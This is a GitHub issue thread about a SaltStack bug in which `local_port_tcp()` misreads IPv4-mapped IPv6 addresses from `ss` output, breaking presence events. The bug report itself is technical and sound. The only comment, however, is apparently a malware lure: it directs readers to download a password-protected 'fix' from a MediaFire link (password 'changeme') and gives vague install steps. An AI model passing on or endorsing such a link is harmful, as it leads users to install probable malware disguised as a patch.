### ISSUE TITLE
[BUG] `salt.utils.network.local_port_tcp()` does not correctly identify connections to IPv4-mapped IPv6 addresses

### ISSUE THREAD

**Issue by terminalmage** [saltstack/salt#66837]
This function, via the [`_remotes_on()`](https://github.com/saltstack/salt/blob/f454911/salt/utils/network.py#L1638) helper function, uses 3 methods to identify connected IP addresses, falling back as necessary:

1. Parsing `ss` output via [`_netlink_tool_remote_on()`](https://github.com/saltstack/salt/blob/f4549113b17ddbb9ce71ee5ba50ba7acbe38982f/salt/utils/network.py#L1703)
2. Parsing contents of `/proc/net/tcp` and `/proc/net/tcp6`
3. Parsing output of `lsof`

Options 2 and 3 both properly handle IPv4-mapped IPv6 addresses, but `ss` returns these addresses with their IPv6 representation, like so:

```
State   Recv-Q  Send-Q          Local Address:Port          Peer Address:Port   Process   
LISTEN  0       1000                           *:4505                      *:*          
ESTAB   0       0               [::ffff:1.2.3.4]:4505       [::ffff:5.6.7.8]:35854        
ESTAB   0       0               [::ffff:1.2.3.4]:4505       [::ffff:8.6.7.5]:33324
```

As a result, the [`_remotes_on()`](https://github.com/saltstack/salt/blob/f454911/salt/utils/network.py#L1638) helper returns a set that looks like this:

```python
{'::ffff:5.6.7.8', '::ffff:8.6.7.5'}
```

If `ss` is not available (and [`_remotes_on()`](https://github.com/saltstack/salt/blob/f454911/salt/utils/network.py#L1638) falls back to checking the `/proc` filesystem), the same connections are returned as their IPv4 representations:

```python
{'5.6.7.8', '8.6.7.5'}
```

The bug in how Salt parses `ss` output causes things like presence events to fail, since the IP addresses don't match the IPs from the minion data cache.

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
